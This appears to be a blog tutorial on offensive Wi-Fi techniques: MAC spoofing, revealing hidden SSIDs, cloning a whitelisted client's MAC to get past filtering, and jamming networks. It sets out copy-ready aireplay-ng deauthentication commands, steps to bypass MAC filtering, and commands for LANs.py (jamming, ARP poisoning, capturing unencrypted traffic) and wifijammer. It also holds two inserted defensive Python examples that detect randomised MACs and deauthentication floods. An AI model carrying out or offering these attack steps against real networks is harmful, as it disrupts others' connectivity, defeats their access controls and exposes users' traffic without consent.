RuCore.NET – English Version

4 best Wi-Fi hacking techniques

1. Change and automatically generate a new MAC address when connected to Wi-Fi again

A MAC (Media Access Control) address is a unique identifier assigned to each piece of active network equipment (network adapter, router, switch, and so on) or to individual interfaces of it.

The MAC is burned into the hardware at manufacture and is used on the network to identify the sender and recipient of a frame. The idea is that when a new device appears on the network, the administrator does not have to assign an address manually.

Hexoctet MAC Address Structure

A MAC is unique (or at least should be) for each network interface. A single device can have several of them: a laptop usually has at least two, one for the wired Ethernet controller and one for the Wi-Fi adapter. A router or switch has a separate address for each port, and on a Wi-Fi router each wireless interface has its own address as well (modern routers have separate 2.4 GHz and 5 GHz radios).


Why change the MAC?

The MAC identifies a device unambiguously and does not change when the operating system is reinstalled, because it is stored in the chip that implements the network interface.

Pentesters and attackers hide their MAC so that their hardware cannot be identified during an attack. The reason is obvious: if you use your real MAC, it may already have been logged when you connected to other networks. There are also tools that map MAC addresses to geographic coordinates, such as the iSniff-GPS script shipped with Kali.


Practice

So, suppose you are using Linux. Let’s see how to change the MAC without any additional software.

Open a terminal and enter the command:

$ ifconfig | grep HWaddr

On newer versions of net-tools the address field is labelled ether instead, so use:

$ ifconfig | grep ether

To temporarily change your MAC, you must turn off the corresponding network interface. For example, for the eth1 interface, the command is this:

$ ifconfig eth1 down

Now set a new MAC:

$ ifconfig eth1 hw ether 00:00:00:00:00:11

The digits can be anything you like, as long as the address keeps this six-octet pattern.

Now bring eth1 back up:

$ ifconfig eth1 up

Finally, check that the change took effect: look at the MAC list again and you will see that the interface’s address has changed. After a reboot, however, the old MAC will return.

It would be nice if the MAC changed every time you connected to a network. The NetworkManager package can do this for us: starting from version 1.4 it supports MAC spoofing, with many useful options.

MAC rules are configured separately for two groups: wired (ethernet) and wireless (wifi).

Also keep in mind that a wireless adapter can be in one of two states:

    • scanning – controlled by the property wifi.scan-rand-mac-address. The default is yes, i.e. a random MAC address is used while scanning; set it to no to disable this;
    • connected to a network – controlled by the property wifi.cloned-mac-address, whose default value is preserve.

The following values are available for the wired interface (ethernet.cloned-mac-address property) and for the wireless interface in the connected state (wifi.cloned-mac-address):

    • an explicitly specified MAC – that is, you can set your own permanent MAC;
    • permanent – use the MAC address burned into the device (default);
    • preserve – do not change the MAC of the device on activation (for example, if the MAC was changed by another program, the current address is kept);
    • random – generate a random value for each connection.

NetworkManager is configured through the /etc/NetworkManager/NetworkManager.conf file. Alternatively, you can drop an additional file with the .conf extension into the directory /etc/NetworkManager/conf.d (the file can be named anything you like). I recommend the second method: when NetworkManager is updated, it usually replaces the main .conf, and any changes you made to it are lost.


Enable automatic generation of random MAC addresses

If you want to change the MAC address every time you connect, but use the same MAC every time you connect to the same network, you need to add a couple of lines to the config. Here they are:

[connection]
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable

You can specify the ethernet.cloned-mac-address and wifi.cloned-mac-address properties individually or together.

You can check the values with ip a. For the changes to take effect, restart NetworkManager:

$ sudo systemctl restart NetworkManager

Now connect to the wireless network and check the MAC values again.

The same addresses will be generated for the same networks. If you want a different address every time, the configuration is similar:

[connection]
ethernet.cloned-mac-address=random
wifi.cloned-mac-address=random

Set specific MAC

Let’s say we need to use a specific MAC. To do this, we again edit /etc/NetworkManager/conf.d/mac.conf.

To specify a MAC for the wired interface, add these strings:

[connection]
ethernet.cloned-mac-address=<new MAC>

To set the MAC for a wireless connection, these are the ones:

[connection]
wifi.cloned-mac-address=<new MAC>

Instead of <new MAC>, of course, you should write the correct MAC address. And of course, you can set up settings for both wired and wireless connections at the same time.

Note that with this method, the MAC will only change once you connect to the network. Until then, the interfaces will have their source addresses. Wi-Fi may be an exception if you have already set up spoofing, as shown above. To cancel a spoofing, add these lines to the config:

[device]
wifi.scan-rand-mac-address=no

And restart the service for the changes to take effect.


More ways to programmatically change MAC

NetworkManager is not the only thing that can change a MAC. In fact, there are many ways to do it, using both third-party software and system services. So that we can observe the results, change the NetworkManager settings:

[device]
wifi.scan-rand-mac-address=no

Now it won’t spoof the MAC while scanning wireless networks.

Since ethernet.cloned-mac-address and wifi.cloned-mac-address are not set, the default value (preserve) applies, so NetworkManager will keep a MAC that another program has changed.

I will run the examples below on Kali Linux and change the settings of the Wi-Fi adapter. All these methods have one thing in common: the changes are lost after a reboot or after the adapter is reconnected.


MAC via iproute2

We will use the ip program from the iproute2 package. Start by checking the current MAC:

$ ip link show

You will see the MAC address after link/ether. The first step is to bring the corresponding interface down. In my case it is wlan0.

$ sudo ip link set dev wlan0 down

Next comes the actual MAC spoofing. You can set any value, but bear in mind that a network can be configured not to issue addresses unless the MAC matches a device from some known vendor. It is therefore better to keep a known prefix as the first three bytes and change only the last three.

To change the MAC, run:

$ sudo ip link set dev <interface> address <MAC>

Substitute your own interface name and address.

The last step is to return the interface to the up state:

$ sudo ip link set dev <interface> up

Finally, check that the change took effect:

$ ip link show <interface>

The value of link/ether should now be the one you set.


Macchanger

Another option is macchanger. It can generate a MAC that looks like a particular manufacturer’s hardware, or fully randomize it. In Kali, this utility is installed by default.

When you change the MAC, as with other methods, the device should not be used, so turn it off:

$ sudo ip link set dev <interface> down

In what follows the interface is wlan0; substitute yours if necessary.

To display the current MAC values, run the utility with the -s option:

$ sudo macchanger -s wlan0

It prints the current MAC and the permanent one burned into the device (useful when they differ), along with the vendor. For example:

Current MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

To change the MAC to a completely arbitrary address, there is an option -r:

$ sudo macchanger -r wlan0

The output will show a third line with the new address under the two shown above.

To randomize MAC without changing the first three bytes (manufacturer prefix), there is an option -e:

$ sudo macchanger -e wlan0

If you want to set a specific MAC yourself, use -m:

$ sudo macchanger -m <MAC> wlan0

Instead of <MAC> put the desired address.

Finally, to return the original MAC, there is an option -p:

$ sudo macchanger -p wlan0
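As an added example (not from the original article), here is a small Python check that applies the MAC structure described above from the defender’s side: it rejects malformed addresses, splits the OUI from the NIC part, and reads the locally administered bit that macchanger -r (without -b) and NetworkManager’s random/stable modes set by default, then screens constructed DHCP lease lines for such addresses. The log lines, hostnames, IPs and the second and third MACs are made up; the first MAC is the ALFA adapter address quoted above.

```python
import re

MAC_RE = re.compile(r"\b([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b")

def parse_mac(text):
    """Return the six octets of a colon-separated MAC; reject anything that is not exactly six."""
    parts = text.strip().split(":")
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]{2}", p) for p in parts):
        raise ValueError(f"not a 6-octet MAC address: {text!r}")
    return bytes(int(p, 16) for p in parts)

def is_valid_mac(text):
    try:
        parse_mac(text)
        return True
    except ValueError:
        return False

def classify_mac(text):
    """Split a MAC into OUI and NIC halves and decode the two flag bits of the first octet:
    bit 0 (I/G) marks a group/multicast address, bit 1 (U/L) a locally administered one."""
    octets = parse_mac(text)
    return {
        "oui": ":".join(f"{b:02x}" for b in octets[:3]),
        "nic": ":".join(f"{b:02x}" for b in octets[3:]),
        "multicast": bool(octets[0] & 0x01),
        "locally_administered": bool(octets[0] & 0x02),
    }

def screen_leases(lines):
    """Pull client MACs out of log lines and return the unicast ones carrying the
    locally administered bit, which randomisers set by default, as (mac, oui) pairs."""
    flagged = []
    for line in lines:
        for mac in MAC_RE.findall(line):
            info = classify_mac(mac)
            if info["locally_administered"] and not info["multicast"]:
                flagged.append((mac.lower(), info["oui"]))
    return flagged

# Constructed dnsmasq-style lease lines: the first MAC is the burned-in ALFA address from the
# article (OUI 00:c0:ca), the second a randomised one (first octet 0xa6 has bit 1 set).
SAMPLE_LOG = [
    "dnsmasq-dhcp[812]: DHCPACK(wlan0) 192.168.1.20 00:c0:ca:96:cf:cb alfa-nic",
    "dnsmasq-dhcp[812]: DHCPACK(wlan0) 192.168.1.21 a6:1b:3c:4d:5e:6f",
    "dnsmasq-dhcp[812]: DHCPACK(wlan0) 192.168.1.22 3c:5a:b4:01:02:03 printer",
]

if __name__ == "__main__":
    print(screen_leases(SAMPLE_LOG))  # [('a6:1b:3c:4d:5e:6f', 'a6:1b:3c')]
```

Randomised addresses are legitimate on many client operating systems, so the flag is a hint for correlation with other logs rather than proof of spoofing.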


2. Hidden SSID Detection

Some access point owners configure them not to broadcast the network name (ESSID). This is usually done as an additional security measure: users will not see the network in the list of available ones and have to type the name manually to connect.

This is a weak security measure, because at certain moments the ESSID is still transmitted in the clear.


Revealing a hidden SSID with Airodump-ng

You can catch the ESSID over the air while a client is connecting. To do this you either wait for it to happen naturally or force it by disconnecting everyone from the access point, which is called deauthentication. The disconnected clients will automatically reconnect, and the network name will appear in the clear.

The first thing to do is to run airodump:

$ airodump-ng <interface>

When it picks up the hidden network, you will see its BSSID, the length of the name and the channel in use. For example, if the network is on channel 1, you can restrict the capture to it:

$ airodump-ng wlan0 --channel 1

As when capturing a handshake, you can pass -w followed by a file name prefix; capturing the handshake does not interfere with detecting a hidden access point. Next, either wait for someone to connect or deauthenticate all clients:

$ aireplay-ng -0 3 -a <BSSID> wlan0

Here -0 selects the deauthentication attack and 3 is the number of packets to send.

The result is almost instantaneous: you will see a line with the full name of the hidden access point.


3. Bypassing MAC filtering with an address from the whitelist

Airodump-ng helps us solve this problem too. Put the adapter into monitor mode and run:

$ ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up 
$ airodump-ng wlan0

You will see the list of networks, the number of connected clients and their MAC addresses, one of which can be assigned to your adapter if the network filters by whitelist.

It also happens that no clients are shown for some access points at first, because the program has not yet collected enough information. Deauthentication helps here as well: if the access point has at least one client, you will see it as soon as it reconnects. You can capture handshakes at the same time.

For deauthentication, we stop Airodump-ng and start again, only with the channel of the point of interest.

$ airodump-ng wlan0 --channel 1

Then we send deauthentication packets and watch what happens:

$ aireplay-ng -0 5 -a <MAC> wlan0

After the attack, some previously unseen clients will be revealed. Copy the MAC of one of the legitimate users, set it on your network card as shown above, and you can proceed with the attack.


4. Jamming a Wi-Fi network

During a pentest you may need to jam some access points. For this I recommend the LANs utility. It can do more than jam Wi-Fi: it can also snoop on users and selectively poison the ARP tables of the target machine, the router and, if necessary, the DNS server.

The jamming range depends heavily on the power of the adapter, but the script has options to jam everything or only a single client. It is all straightforward: install the dependencies and download the script itself.

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan

$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

Now you can run our script to start jamming.

$ python LANs.py -u -p

The -u and -p options mean active target discovery for ARP spoofing and output of all interesting unencrypted data the targets send or request. No -ip option is given here, so an ARP scan of the network is performed and its results are compared against a live capture in promiscuous mode. The result is a list of all clients on the network.

Once you have built a map of the network and seen the list of connected clients, press Ctrl+C to stop the scan. Nmap, by the way, works just as well for this purpose.

The jamming command looks like this:

$ python LANs.py --jam --accesspoint <MAC router> -s <MAC to skip>

Here:

  • --jam – jam all or some 2.4 GHz wireless access points and clients within reach; additional arguments can be used if necessary (see below);
  • -s – specify a MAC that will not be deauthenticated;
  • --accesspoint – the MAC of the specific access point to target.

Jamming all Wi-Fi networks looks like this:

$ python LANs.py --jam

Jamming only one access point:

$ python LANs.py --jam --accesspoint <BSSID>

Here you can also specify some additional options:

  • -ch – limit jamming to one channel;
  • --directedonly – do not send deauthentication packets to the access point’s broadcast address, only to client/access point pairs;
  • --accesspoint – specify a particular access point as the target.
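Deauthentication is what sections 2 through 4 all rely on, so as an added example (not part of the original article) here is how the flood looks from the monitoring side: a pure-Python parser for raw 802.11 management headers that counts deauth/disassoc frames per BSSID and flags bursts aimed at the broadcast address. It assumes the radiotap header has already been stripped from each frame; the frames and BSSIDs are constructed inline.

```python
import struct
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT, DISASSOC, DEAUTH = 0, 10, 12   # 802.11 frame type 0 and its management subtypes

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(frame):
    """Parse a raw 802.11 MAC header (radiotap already stripped); None if truncated.
    Frame control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    info = {"type": (fc0 >> 2) & 0x3, "subtype": (fc0 >> 4) & 0xF,
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "reason": None}
    # deauth/disassoc bodies start with a 2-byte little-endian reason code
    if info["type"] == MGMT and info["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info

def detect_deauth_flood(frames, threshold=3):
    """Group deauth/disassoc frames by BSSID and report those at or above threshold,
    noting whether any were aimed at the broadcast address (everyone kicked at once)."""
    counts, broadcast = Counter(), set()
    for frame in frames:
        p = parse_frame(frame)
        if p and p["type"] == MGMT and p["subtype"] in (DEAUTH, DISASSOC):
            counts[p["bssid"]] += 1
            if p["dst"] == BROADCAST:
                broadcast.add(p["bssid"])
    return {b: {"count": c, "broadcast": b in broadcast}
            for b, c in counts.items() if c >= threshold}

# Constructed capture with made-up BSSIDs: fc=c000 is a deauth, fc=8000 a beacon; then
# duration, addr1 (dst), addr2 (src), addr3 (bssid), sequence control and reason code 7.
DEAUTH_BCAST = bytes.fromhex("c000 0000 ffffffffffff 001122334455 001122334455 0000 0700")
BEACON = bytes.fromhex("8000 0000 ffffffffffff 001122334455 001122334455 0000")
DEAUTH_ONE = bytes.fromhex("c000 0000 ccddeeff0011 66778899aabb 66778899aabb 0000 0700")
SAMPLE = [DEAUTH_BCAST] * 3 + [BEACON, DEAUTH_ONE]

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))  # {'00:11:22:33:44:55': {'count': 3, 'broadcast': True}}
```

On a real capture, feed the frames in per time window; a handful of broadcast deauths from one BSSID within a few seconds is the pattern the aireplay-ng -0 and --jam commands above produce, while 802.11w (management frame protection) on the access point makes the forged frames ineffective in the first place.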


Another effective Wi-Fi jamming script

Another convenient way to jam Wi-Fi is the wifijammer utility. It is extremely easy to use, so there is almost nothing to discuss: with no parameters it simply jams everything within range of the adapter. To avoid hitting your own devices, you can exclude some MAC addresses with the -s option.

Install wifijammer:

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/wifijammer.git
$ cd wifijammer/

And run it:

$ sudo python2 wifijammer.py -s <MAC for exception>

That’s it!